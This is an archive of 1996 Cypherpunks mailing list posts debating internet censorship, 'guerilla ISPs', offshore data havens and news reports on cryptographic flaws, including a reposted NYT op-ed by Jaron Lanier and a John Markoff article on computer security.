> Y8VWdh98ZXM=
> =V6vA
> -----END PGP SIGNATURE-----
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Lesher <wb8foz@nrk.com>
Date: Tue, 2 Jan 1996 17:19:23 +0800
To: bdolan@use.usit.net (Brad Dolan)
Subject: Re: Another Internet Provider Censors Access (fwd)
In-Reply-To: <Pine.SOL.3.91.960102000200.10683A-100000@use.usit.net>
Message-ID: <199601020639.BAA05196@nrk.com>
MIME-Version: 1.0
Content-Type: text/plain




> Under the guise of a minor software upgrade, Netcom has changed 
> its newsgroups access list to totally exclude "alt" groups 
> altogether.  Since there is no way to sign up for a newsgroup 
> other than via the selection menu that Netcom provides, it 
> appears that Netcom has managed to censor access to all those 
> discussion groups.

Horsefeathers.
I'm reading alt.fan.david-sternlight in another window
as I type. Yes, on netcom8.netcom.com.....

-- 
A host is a host from coast to coast.................wb8foz@nrk.com
& no one will talk to a host that's close........[v].(301) 56-LINUX
Unless the host (that isn't close).........................pob 1433
is busy, hung or dead....................................20915-1433




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Tue, 2 Jan 1996 20:17:46 +0800
To: cypherpunks@toad.com
Subject: Unmuzzling the Internet
Message-ID: <199601021139.GAA10271@pipe4.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   The New York Times, January 2, 1996, p. A15.


   Unmuzzling the Internet [OpEd]

      How to evade the censors and make a statement, too.

   By Jaron Lanier (Visiting scholar at the Columbia
   University department of computer science.)


   If President Clinton signs the telecommunications bill
   drastically restricting private as well as public speech on
   the Internet, he can expect a rollicking cat-and-mouse
   game.

   It can be comical when politicians try to control something
   they do not understand. Such is the case with the bill's
   censorship provision, which not only outlaws the
   transmission of material over the Internet that would be
   allowed in most newspapers, but also makes owners of
   computers on a network liable for the speech of others. (As
   Compuserve demonstrated last week when, to satisfy a German
   court, it blocked American subscribers' access to sexually
   explicit material, regulation of the Internet can threaten
   both commercial and constitutional freedoms.)

   The other day, I came up with a way to easily evade the
   proposed American restrictions. My simple idea would be to
   create a computer program, dubbed "Unmuzzle," which would
   deposit incomprehensible fragments of any forbidden
   material in different foreign computers (though maybe not
   Germany's). The contraband communication would only be
   reassembled into a coherent whole when downloaded in the
   home of the user back in the United States, where it would
   become protected speech, as in any other medium.

   I had no intention of actually building "Unmuzzle," but I
   mentioned the notion in E-mail to a friend, and within days
   I was hearing from people I didn't know who were busy
   creating the program with the idea of distributing it
   freely. Fine with me. Such a program would make an mportant
   statement.

   Speaking as someone who has been involved with computers
   for most of my life (I coined the phrase "virtual reality"
   in the early 1980's and created much of the technology for
   it), I find that many Internet users have been reacting to
   attacks on freedom in cyberspace by slumping into a
   separatist, angry mood. They feel that they are being
   denied the rights that others enjoy.

   On the Internet, separatism is expressed by encryption: an
   encrypted message can be read only by the party it is
   intended for. Therefore, in the spirit of the First
   Amendment, I suggest Unmuzzle as an alternative method: it
   may break up images or text into a hundred pieces, but they
   are still accessible to the public.

   The idea of censoring the Internet should be unthinkable,
   especially in the United States. Aside from the question of
   free speech, there's the economic imperative as well. The
   Internet is not a plaything: it is the infrastructure of
   our information technology industry.

   The young have the most to lose from the new restrictions,
   in spite of the fact that such limits are purportedly meant
   to protect them. Schools and libraries will find it
   extremely difficult to offer vital Internet services in the
   face of a mine field of criminal liabilities.

   It is members of Congress and the President who need to
   show some maturity, by rejecting free-speech restrictions
   in the telecommunications bill.

   [End]













From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Wed, 3 Jan 1996 05:16:29 +0800
To: cypherpunks@toad.com
Subject: Re: Guerilla Internet Service Providers
Message-ID: <2.2.32.19960102115316.008b7368@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


At 09:07 PM 1/1/96 -0500, David Mandl wrote:
>I agree.  It's not a good idea to assume that there's going to be some kind
>of widespread opposition movement when the big Net Crackdown comes.  Most
>people will either obey the law, be unaffected by it, or violate it in very
>insignificant ways ("net jaywalking").  There's strength in numbers, but I
>just don't think the numbers will be there.
>
>   --Dave.

During Prohibition, consumption of illegal booze increased steadily during
the whole period.  Hard liquor consumption was actually higher at the end of
Prohibition than it had been before Prohibition.

DCF





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Tue, 2 Jan 1996 20:36:00 +0800
To: cypherpunks@toad.com
Subject: Re: Guerilla ISP's...
Message-ID: <2.2.32.19960102115836.008c6b40@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


At 06:49 PM 1/1/96 -0800, Lucky Green wrote:

>That is called a conspiracy. The consequence is that all machines involved
>will be confiscated and their respective owners jailed.
>
>
>-- Lucky Green <mailto:shamrock@netcom.com>
>   PGP encrypted mail preferred.

If the processes are operating in encrypted accounts not under the control
of the machine owner it is hard to find the machine owner liable.  In
addition, the Feds can only afford a few prosecutions at $50-$100K each
(Brian, if you're listening what *does* the average Federal prosecution
cost?).  The cost of setting up servers is much lower than the cost of
busting them.

DCF

"RIP -- the Interstate Commerce Commission.  Dead Jan 1 at the age of
120(?).  The first Federal regulatory agency.  One down, thousands to go."





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Ed Carp [khijol SysAdmin]" <erc@dal1820.computek.net>
Date: Tue, 2 Jan 1996 22:03:08 +0800
To: shamrock@netcom.com (Lucky Green)
Subject: Re: Guerilla ISP's... (fwd)
In-Reply-To: <v02120d01ad0e88295ae1@[192.0.2.1]>
Message-ID: <199601021330.HAA11247@dal1820.computek.net>
MIME-Version: 1.0
Content-Type: text


-----BEGIN PGP SIGNED MESSAGE-----

Lucky sez:
> At 21:20 1/1/96, sameer wrote:
> >> Prosecution followed by conviction is what will happen to the owner of the
> >> computer on which the OS was running.
> >        It's hard to jail a corporation.
> 
> Pretty hard. That's why the corporate officers will be jailed instead. Not
> that this would be necessary to stop the corporation from operating.  The
> authorities can just confiscating all the equipment and thereby put the
> corporation out of business. Saves time and trial costs. They just haul off
> the computers and declare that they are now property of the government.

Good way to get the latest and greatest technology without paying for it, 
too.  I wonder how many of those Mercedes and BMWs are sitting around in 
impound lots ad how many of them are being driven around by DEA bigwigs?

Didn't they used to do this sort of thing 200+ years ago - convict 
someone of a minor crime, then seize all their assets?  Wasn't this one 
of the things that prompted the US breaking away from GB?

Seems like history is full of stuff like this.  Sad case of 'those who 
fail to learn from history are destined to repeat it.'
- --
Ed Carp, N7EKG    			Ed.Carp@linux.org, ecarp@netcom.com
					214/993-3935 voicemail/digital pager
					800/558-3408 SkyPager
Finger ecarp@netcom.com for PGP 2.5 public key		an88744@anon.penet.fi

"Past the wounds of childhood, past the fallen dreams and the broken families,
through the hurt and the loss and the agony only the night ever hears, is a
waiting soul.  Patient, permanent, abundant, it opens its infinite heart and
asks only one thing of you ... 'Remember who it is you really are.'"

                    -- "Losing Your Mind", Karen Alexander and Rick Boyes

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMOkzXyS9AwzY9LDxAQG0CAQAgSNBJnp0IFwCL8YfpF1n7xQUIkQsN8Mq
gaHD1SBPvVUvOtqQqgUK8uQVLGeN5aXVcITtt0RfSgqQKQ8twmkbKtaU9t5hwNnb
seN4N3RJ3IbOKGV0nfj9u8fUGyIDuZQGX916RyPWUgDuF0iORpBpf5aEjJCEeqyq
ebuU6dxaUgo=
=6tCV
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Wed, 3 Jan 1996 03:43:21 +0800
To: cypherpunks@toad.com
Subject: In Search of Computer Security
Message-ID: <199601021239.HAA10963@pipe4.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   The New York Times, January 2, 1996, p. C15.
   Special section "Business World Outlook '96."


   In Search Of Computer Security

   By John Markoff


   Computer security is making a transition from the
   university and the research laboratory to the real world.
   So far it is proving to be a rocky evolution.

   Last year, a series of embarrassing gaffes and shortcomings
   undermined the faith of potential computer users in the
   certainty that their data are secure. The flaws have led to
   a growing realization that computer security systems are
   largely untested and that in complex environments like the
   Internet, they do not always respond the way their creators
   had intended.

   Paul C. Kocher, a computer security expert who discovered
   one potential flaw, said, "Many of the security systems
   that I am examining are good enough to keep out casual
   snoopers, but they're failing catastrophically when it
   comes to protecting data against determined attacks."

   The problems are emerging as the computer industry
   increasingly relies upon an arcane mathematical discipline
   that is intended to hide the secrets embedded in digital
   information behind a veil of imposing math problems.

   Cryptography, the science of writing secrets, was for
   centuries largely the province of kings, soldiers and
   spies. But that has changed in the 1990's as the world has
   rushed to use personal computers and computer networks as
   the basis for electronic commerce, communication and
   entertainment.

   Data scrambling has become the key to a vision that it will
   be possible to have private electronic conversations and
   secure financial transactions.

   In principle, data coding protects information by
   scrambling it to keep it out of the reach of everybody but
   those with a supercomputer and tens or even hundreds of
   years to crunch the data.

   But computer researchers have begun discovering flaws,
   sometimes subtle and sometimes glaring, that can help
   criminals take devious shortcuts to obtain the mathematical
   keys used to scramble the data.

   In August, a French computer hacker proved that it was
   possible to use a network of work stations to guickly find
   the secret key created by a coding system developed by the
   Netscape Communications Corporation, the leading developer
   of World Wide Web software.

   The feat cast doubts on the security of a system whose
   security had been scaled back to meet stringent United
   States Government export controls.

   The following month, two computer science graduate students
   at the University of California at Berkeley reported a flaw
   in the Netscape that would permit a technically skilled
   attacker to steal data by circumventing the complex
   calculations needed to break the code.

   In October, a team of Berkeley researchers, including the
   two computer science students, detailed security weaknesses
   in the fundamental software of the Internet that make it
   difficult to protect data that is sent between computers.

   And last month, Mr. Kocher explained a potential flaw in a
   widely used data coding approach known as public-key
   cryptography.

   The flaw could allow eavesdroppers to infer a secret key
   used to protect data in Internet security software,
   electronic payment smart cards and related systems by
   carefully timing how long it takes to compute the secret
   key.

   Mr. Kocher said that while he believed that trusted
   electronic security systems would ultimately emerge, there
   should be no urgency to rush their deployment.

   Banks have spent several hundred years perfecting systems
   for protecting money, he noted, but they have far less
   experience with the new computerized systems designed to
   protect information that represents money.

   One of the pioneers in the mathematics underlying most
   public key systems agrees that prudence is required in
   developing digital commerce.

   "Paul's discovery is one more piece of evidence that
   designing security mechanisms is tricky," said Whitfield
   Diffie, a Sun Microsystems researcher who was one of the
   co-inventors of the original public key technology.

   "Given the trust that we will be placing in systems for
   electronic commerce," he continued, "we should be putting
   all the effort we can into getting them right."

   [End]

----------

   [Box] 1996 Will Be the Year When:

   "Congress will pass a law restricting public comment on the
   Internet to individuals who have spent a minimum of one
   hour actually accomplishing a specific task while on line."

   Andrew Grove, Intel Corp. CEO













From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Tue, 2 Jan 1996 17:16:47 +0800
To: Cypherpunks@toad.com
Subject: Re: Guerilla Internet Service Providers
Message-ID: <199601020640.HAA03781@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On 1/1/96 at 3:11 pm Lucky Green replied to Andreas Bogk about:

>>So I guess we'll need some computers in outer space, on offshore boats
>>or in well-bribed stable dictatorships.

>o Outer space: not very realistic
>o Offshore boats: see the fate of drug trafficers in international waters
>after the Coast Guard is through with them.

What about using converted freighters offshore in international waters
for storing the computers? i.e. Sameer the Wolfman Jack of Pirate Internet 
Services (tm)  

I was told that Belize is offering passports for the next two years for $50,000 
and that might be even less if offers were made to the government to provide 
low cost Internet access to the citizens of Belize.

http://www.belize.com/citzdoc.html

Belize has always been known as a home for pirates, A wonderful Cypherpunk
candidate for an offshore data haven!

L. Malthus


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMOjOmQJo+wOswDgJAQEdGgP8CzcIf7/p1QS8yYc7uelApYLWcDUHo1AE
LHBz4kWg8bdrvWEqck1oIgY/Z+gvr88tKP3l7TDei8y+mJFoqYeSM27aE0ohvS2a
XVq7YwbGs+/CKTWJTWsyxwsQEQHyj+Ig7oY+JB76wUN9WTz9pfuwXQ7oaF4RXHcf
WqFOXM6ogMA=
=0UFR
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Ed Carp [khijol SysAdmin]" <erc@dal1820.computek.net>
Date: Tue, 2 Jan 1996 23:21:51 +0800
To: nobody@REPLAY.COM (Anonymous)
Subject: Re: Guerilla Internet Service Providers
In-Reply-To: <199601020640.HAA03781@utopia.hacktic.nl>
Message-ID: <199601021341.HAA12007@dal1820.computek.net>
MIME-Version: 1.0
Content-Type: text


-----BEGIN PGP SIGNED MESSAGE-----

> On 1/1/96 at 3:11 pm Lucky Green replied to Andreas Bogk about:
> 
> >>So I guess we'll need some computers in outer space, on offshore boats
> >>or in well-bribed stable dictatorships.
> 
> >o Outer space: not very realistic
> >o Offshore boats: see the fate of drug trafficers in international waters
> >after the Coast Guard is through with them.

Why isn't outer space realistic?  We already have store-and-forward 
packet radio systems in AMSAT satellites - they usually hitch a ride up 
with a commercial satellite.
- --
Ed Carp, N7EKG    			Ed.Carp@linux.org, ecarp@netcom.com
					214/993-3935 voicemail/digital pager
					800/558-3408 SkyPager
Finger ecarp@netcom.com for PGP 2.5 public key		an88744@anon.penet.fi

"Past the wounds of childhood, past the fallen dreams and the broken families,
through the hurt and the loss and the agony only the night ever hears, is a
waiting soul.  Patient, permanent, abundant, it opens its infinite heart and
asks only one thing of you ... 'Remember who it is you really are.'"

                    -- "Losing Your Mind", Karen Alexander and Rick Boyes

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMOk2ByS9AwzY9LDxAQFM0AQAgrdQAJnu5Jd3edGDqCMfCU5TFnBJRp7Z
gg6bdH1SdSKVEe+/GGFsHg6ITUWg6L9Hjuz63jw6yrjek4i7GZZY4pcb44Cqe4cP
CSk5GJkebJL21dl3egN+jAmNl+rD5JJfTW/jHCibB5p/6cWem9QEUmhLDquFZebb
/fFQEHN0A/E=
=MUq5
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: andr0id@midwest.net (Jason Rentz)
Date: Wed, 3 Jan 1996 07:05:07 +0800
To: cypherpunks@toad.com
Subject: Re: Guerilla Internet Service Providers
Message-ID: <199601021435.IAA10484@cdale1.midwest.net>
MIME-Version: 1.0
Content-Type: text/plain


>At 23:30 1/1/96, Andreas Bogk wrote:
>
>>So I guess we'll need some computers in outer space, on offshore boats
>>or in well-bribed stable dictatorships.
>
>o Outer space: not very realistic
 
Not that I'm into Guerilla Internet Services or anything; but; an Outer
space server isn't all that far off.  Its not hard at all controlling a
lynix box remotely using a good sat. link.  

All you need to do is go to your nearest junkyard and get an old used
Satalite, contract Russia to send it up for you for the price of an e-mail
account or somthin and away you go.   :)

(andr0id@midwest.net  callsign: N9XLM)
( Computer Consulting & Management   )
(P.O. Box 421  Cambria, IL 62915-0421)

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6.2

mQENAzCsIi4AAAEH/1hb5+tO/n99Nbppf0ImLJ6AaVZ3NlZP0ZHwRQor00uA129i
d4zWixNXxc8t2auaqN+asV99LpIip3/nQzBnjydiumeBdGLF2PR9+6X8X/RrqKa1
dVIukxM5Agg2eM6ih+0J38hgKJ3qzKXSz6sjYmpaxvbXZoHHOLUk/ZtHUKvvEyPw
hnJEYnut8NUnIeK56lqeqRw86yoeRKymbfCdjdpgeY2aRwK2FJts8sbb7Fs10s4y
jgxWIxIipBznbGUTh1hb2XrLGPENwk3E/qqXQJEsrySbtwdl6VgTVQjhDDEJMitL
DYeiQ3W5EgxfcdbM1j2FwYu3P/dM6Y0I8xLMYT0ABRG0NmFuZHIwaWRAb2ljdTgx
Mi5jb20gKG9pY3U4MTIuY29tIHN5c3RlbSBhZG1pbmlzdHJhdG9yKYkBFQMFEDCs
LO90C7R/GkJcSQEB01cH/0KC3sd+u4OxMku5378SJktoN6QIQYLJ7uVbuV4S51yK
NAotCGf4Wl6wwjynzZvXKU0H87oDuMiq7FybgMNL2n+4bQIZi0iz0lIuzwoMDu63
NrHUW9Kz42pOnhrEhrdkHhHL9O5GgD1yc40fJ3qw5h7LQEjDxgypyw0IFILFc34u
LeRLliNibxKp8JwAxXNHWSgxu28TQvmnkHi0AHP6tJ/uZYe+4dqJtrMMsYFjzZaz
DPmxD+dzbTwlQKtJaP1ZkDI0Sr072wrZDv+G86GyGBMX2lpSafpRitnxuUttjU9o
wsQ9Qo5xiH1nZRCs/bDzJe/gng+GHzevixDIITurtNA=
=SgPT
-----END PGP PUBLIC KEY BLOCK-----






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Wed, 3 Jan 1996 12:00:33 +0800
To: Felix Lee <flee@teleport.com>
Subject: Re: Guerilla Internet Service Providers (fwd)
Message-ID: <m0tXAsV-00090IC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 08:27 PM 1/1/96 -0800, you wrote:

>Jim Choate:
>> If you live in the Austin, TX area I will setup a dedicated slip for you at
>> only $100/mo.
>
>in the Portland Oregon area, the price ranges from $234/year to
>$1750/year for unlimited ppp access.  (I have no idea how long the
>$234/year is going to stay in business.  that won't even cover the
>cost of a phone line.)


It seems to me that phone line costs are turning into a floor price for
Internet access, when they shouldn't really be.  The main asset telephone
companies have, right now, is in RIGHTS OF WAY.  Put an ISP in a business
park that allows you to run  your own dedicated copper pairs, and you've
bypassed $25/month/line business phone line charges. 

At some point, individual urban and suburban blocks could easily be
"guerilla re-wired" for ISP access without serious trenching, etc.  The
phoneco would still be involved, but in a far lower-profit mode, as the
supplier of a single T1 to a multi-block area.  





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Wed, 3 Jan 1996 08:19:34 +0800
To: cypherpunks@toad.com
Subject: COP_box
Message-ID: <199601021507.KAA00575@pipe1.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   1-2-96. WaPo:

   "Undercover on the Dark Side of Cyberspace. On-Line FBI
   Agents Troll for Those Who Prey on Children."

      The FBI unit now has more than $1 million worth of
      equipment, including high-speed modems and large data
      storage devices. In cases where suspects' computers have
      been seized, the agents have run up against
      password-protected and encrypted files, which sometimes
      have taken FBI technicians hundreds of hours to decode.


   1-2-96. FiTi:

   "Pobox and the magic cookie."

      Which company will have the greatest effect on the
      development of the Internet this year? My answer is
      neither Microsoft nor Netscape. It is a tiny new company
      called Pobox.com. Its product consists of a simple
      forwarding service that is an electronic equivalent of
      a post office box. This service allows people to give
      out an e-mail address that is independent of where they
      work or where they choose to buy Internet access.

   COP_box







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Ed Carp [khijol SysAdmin]" <erc@dal1820.computek.net>
Date: Wed, 3 Jan 1996 14:58:02 +0800
To: cjl@welchlink.welch.jhu.edu (cjl)
Subject: Re: Guerilla Internet Service Providers
In-Reply-To: <Pine.SOL.3.91.960102104600.17572B-100000@welchlink.welch.jhu.edu>
Message-ID: <199601021624.KAA22254@dal1820.computek.net>
MIME-Version: 1.0
Content-Type: text


-----BEGIN PGP SIGNED MESSAGE-----

> I don't know if I am the only one who this is happening to, but I keep 
> getting two copies of every post you send.  Has anyone else commented on 
> this?  I will forward them back to you following this response so that 
> you will have the header info if you choose to track down the source of 
> the duplication.

I don't know where the dups are coming from - my logs don't show that I'm 
sending two copies, and no one else has complained.  I'm also not sending 
out dups on any other list I'm on...

- --
Ed Carp, N7EKG    			Ed.Carp@linux.org, ecarp@netcom.com
					214/993-3935 voicemail/digital pager
					800/558-3408 SkyPager
Finger ecarp@netcom.com for PGP 2.5 public key		an88744@anon.penet.fi

"Past the wounds of childhood, past the fallen dreams and the broken families,
through the hurt and the loss and the agony only the night ever hears, is a
waiting soul.  Patient, permanent, abundant, it opens its infinite heart and
asks only one thing of you ... 'Remember who it is you really are.'"

                    -- "Losing Your Mind", Karen Alexander and Rick Boyes

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMOlcFyS9AwzY9LDxAQFSjQP/dYUpg2SNMb3qGhrkerD5nIU0GcopXkZ+
odhi4KhyUiipPljwwBcPxLfrduxW/A8QOviXJR++Fz/ZOnRrZ6NfKC2sgiO3GuYn
W642nNFEJ/cf+pFVxvxcyDMyOc0db+hOWC54JrctyjckNkJKTyE6OyLIfQ3O+aBF
l2YhORWBWOQ=
=0Idn
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "David R. Rorabaugh" <David_R._Rorabaugh@dsmllp.com>
Date: Wed, 3 Jan 1996 21:18:42 +0800
To: cypherpunks@toad.com
Subject: Re: Compuserve *hasn't* banned newsgroups
Message-ID: <199601021605.LAA26607@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

>>I pointed my copy of Free Agent at CPCNET's open news server 
>>(198.70.185.5) and grabbed a list of groups sure enough, there were 
>>the seasoned citizens in all their glory.  And I was checking out 
>>those binaries via CompuServe.

I suspect that CompuServe doesn't care much what goes over their network 
(they will claim "common carrier" status) as much as they care about 
what they themselves provide. The groups in question ARE gone from 
CompuServe's news servers.

- -- 
 David R. Rorabaugh
 Systems Operations Specialist
 Dickstein, Shapiro & Morin, L.L.P.

 The opinions expressed are my own.
- --
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMOlXuioZzwIn1bdtAQGgAgF9GOa8Sl3mu6wDt70k6Ij3ZBAfi0j+9i1f
bxC/+g1qecXUCL//wPwiTToTjyLouUaW
=vXmL
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Wed, 3 Jan 1996 18:54:15 +0800
To: shamrock@netcom.com (Lucky Green)
Subject: Re: Guerilla Internet Service Providers
In-Reply-To: <v02120d00ad0e2f369fc7@[192.0.2.1]>
Message-ID: <199601021624.LAA21091@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Lucky Green writes:
> >> That site will be subject to search, seizure, and arrest and conviction of
> >> owner.
> >
> >but if it turns out that 30% of home PCs have to be seized to prevent
> >dissemination of dangerous-information-X?
> 
> Wrong. Only 0.03% of the home PCs have to be seized and the owners
> incarcerated. The remaining users will cease to carry controlled data on
> their own.

Just like no one smokes pot any more.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mark Hittinger <bugs@ritz.mordor.com>
Date: Wed, 3 Jan 1996 14:17:33 +0800
To: cypherpunks@toad.com
Subject: Netcom censoring alt.* ?
Message-ID: <199601021625.LAA04725@ritz.mordor.com>
MIME-Version: 1.0
Content-Type: text




I don't think thats the case.  I'm the senior admin at the Dallas backup
site for Netcom.  I'm setting up several backup news servers here and we
aren't doing any alt.* censorship.  "alt" groups are still sucking up lots
of bandwidth and gigs :-).

On the other hand the San Jose site has had a lot of power problems and
news software problems to contend with lately (hence the idea of a "backup"
site for netcom :-) )   Maybe you are branching to a conclusion?

Now if there was only a way to tie the scientology thing in with the alt.*
censorship conspiracy.

Regards,

Mark Hittinger
Netcom/Dallas
bugs@freebsd.netcom.com
bugs@ritz.mordor.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Ed Carp [khijol SysAdmin]" <erc@dal1820.computek.net>
Date: Wed, 3 Jan 1996 14:31:18 +0800
To: frissell@panix.com (Duncan Frissell)
Subject: Re: Why Net Censorship Doesn't Work
In-Reply-To: <2.2.32.19960102170305.0069891c@panix.com>
Message-ID: <199601021729.LAA26098@dal1820.computek.net>
MIME-Version: 1.0
Content-Type: text


-----BEGIN PGP SIGNED MESSAGE-----

> It used to be said that no country would be allowed to move from Communism
> to Capitalism.  It can now be said that it is inconceivable that a modern
> country will move from a Market to a Command Economy.  Market discipline is
> strong.

Tell that to folks in the contries of used-to-be-Russia.  Lots of old 
Communist leaders getting back into power - some folks are even saying 
that the old days under the Communists were better than living in a free 
market economy.

Never underestimate the value of human stupidity and shortsightedness.

> Where are the pressure points where regulation can be applied?

How about on the backbone itself?  Since everyone goes through the htree 
major backbones, all one would have to do is control access at those 
points.  Of course, that would lead to clandestine use of 
store-and-forward LEOsats, s&f UUCP sites, etc.  UUCP might even make a 
comeback ;)
- --
Ed Carp, N7EKG    			Ed.Carp@linux.org, ecarp@netcom.com
					214/993-3935 voicemail/digital pager
					800/558-3408 SkyPager
Finger ecarp@netcom.com for PGP 2.5 public key		an88744@anon.penet.fi

"Past the wounds of childhood, past the fallen dreams and the broken families,
through the hurt and the loss and the agony only the night ever hears, is a
waiting soul.  Patient, permanent, abundant, it opens its infinite heart and
asks only one thing of you ... 'Remember who it is you really are.'"

                    -- "Losing Your Mind", Karen Alexander and Rick Boyes

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMOlrZCS9AwzY9LDxAQE5NgP+K0M4dCNmi6lJSiew+BELRQs9A+YU5XeX
TVte3vtTrpwhqePj2c6YXzPtKAl5Bu+JbQxI9+4m6dbmYQ6gW9D7VZLni5EOKWwP
CSHg/bUJIf3tFY5/p0tRPIx800AH+n/TOIg9fMtqe3unjkJ78a014aAij6/ssoyO
UKbUXDYOxOk=
=E+l9
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Wed, 3 Jan 1996 13:31:06 +0800
To: cypherpunks@toad.com
Subject: Criminal Money-laundering Offshore Digital Banks
Message-ID: <ad0eb7df0b021004a9a0@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 1:34 AM 1/2/96, Lucky Green wrote:

>Will C2 carry certain newsgroups/info after doing so has become a felony?
>Who wants to be an 'illegal data' kingpin and face execution? (Kingpins are
>'data trafficers' that carry more than 1.5 Megs of 'controlled
>information'.)

I've also heard that some of these Data Kingpins (shudder!) are making use
of Criminal Money-Laundering Banks (tm), including a bank called "The Mark
Twain Bank"! (I hear that MTB has been offered a deal they cannot refuse.)

These criminal "offshore" banks are of course illegal for ordinary
citizen-units (aka proles) to use, being the sole province of Certain
Government Agencies. Authorized Offshore Criminal Banks, like the Castle
Bank, the Nugan-Hand Bank, and the Bank of Commerce and Credit
International (BCCI) are of course needed by legitimate government as a way
to fund Contra resupply efforts from the Southeast Asian drug trade.

(Seriously, really seriously, our list is generally not a place to obsess
on conspiracies. But anyone who has any doubts about what is going on, and
how some parts of government have become too large/too corrupt, should
spend at least a day or so looking into these things. You should all know
the search keywords by now (BCCI, Mena, Castle Bank, Air America, Khun Sa,
Banco Lavoro del Nazionale, Gehlen, etc.). Anyone who looks into the
tangled web of such dealings will never, ever think the government is
trying to ban encryption so it can protect us from child pornographers.)

--Tim May

We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^756839 - 1  | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Daniel Miskell <DMiskell@envirolink.org>
Date: Wed, 3 Jan 1996 18:50:46 +0800
To: delznic@storm.net
Subject: Re: [local] Syracuse new york
Message-ID: <9601021659.AA08805@envirolink.org>
MIME-Version: 1.0
Content-Type: text/plain


Douglas F. Elznic writes:
>Are their any interested people in having a meeting in the syr area?

I most certainly would.  I currently reside in the western ny state area.  
Anybody else interested?

Munster
---
_________________________________
*!Cheese Doctrine:!*
    Though cultured over time,
and aged to perfection, one must
not yield to produce mold.  One
must also not belittle themselves
by conforming to the "whiz", but
melt over the unprocessed ideas
of Ghuda.
_________________________________






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Wed, 3 Jan 1996 19:23:30 +0800
To: cypherpunks@toad.com
Subject: Why Net Censorship Doesn't Work
Message-ID: <2.2.32.19960102170305.0069891c@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


Sometimes in the day-to-day wrangling with the net censors, we forget the
larger picture.  There is an assumption here and in the media (see the
Newsweek year-end piece on the nets by Steven Levy) that the prospect of 2
years in stir and $100,000 fines will quell net speech.  This seems unlikely
because of the nature of the medium.

Thought control is a very difficult task.  It always has been.  The
Inquisition,  Nazi Germany, the Soviet Union, and the People's Republic of
China tried but three of the four are no longer with us.  Short of
totalitarian controls, thought controls will be ineffective.  And
totalitarian controls are difficult to impose these days.

It used to be said that no country would be allowed to move from Communism
to Capitalism.  It can now be said that it is inconceivable that a modern
country will move from a Market to a Command Economy.  Market discipline is
strong.

Since only totalitarians have a shot (for a short time) to enforce thought
control, the OECD countries will not succeed at thought control.  This used
to be unimportant because one's thoughts were trapped in one's head.  You
could speak only to a few people and "mass media" from books to TV was
expensive, centralized and somewhat easy to control.  You were free in your
mind but cut off from communicating your thoughts freely to others.

Those conditions no longer exist.  If you can think it (or even not think
it) you can communicate it easily and cheaply to others.  Since thought is
free and communications is almost free, control by others is difficult.

The net is a fair mapping of the consciousness of its participants onto a
world spanning communications system.

Large companies and even quite small businesses are concerned about legal
hassles.  They have an investment to lose and they are more likely to be
prosecuted than ordinary individuals.  Ordinary people rightly suspect that
